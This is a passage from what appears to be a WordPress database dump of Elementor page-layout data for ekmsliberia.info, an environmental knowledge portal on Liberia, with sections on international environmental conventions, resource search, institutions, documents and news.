Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(27174,3947,'_elementor_version','3.4.0'),(27175,3947,'_elementor_template_type','wp-page'),(27176,3947,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(27178,3947,'_elementor_pro_version','3.3.6'),(27180,3948,'_wp_page_template','default'),(27181,3948,'_elementor_edit_mode','builder'),(27182,3948,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.237},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.08},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.347},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(27183,3948,'_elementor_version','3.4.0'),(27184,3948,'_elementor_template_type','wp-page'),(27185,3948,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(27187,3948,'_elementor_pro_version','3.3.6'),(27189,3949,'_wp_page_template','default'),(27190,3949,'_elementor_edit_mode','builder'),(27191,3949,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read 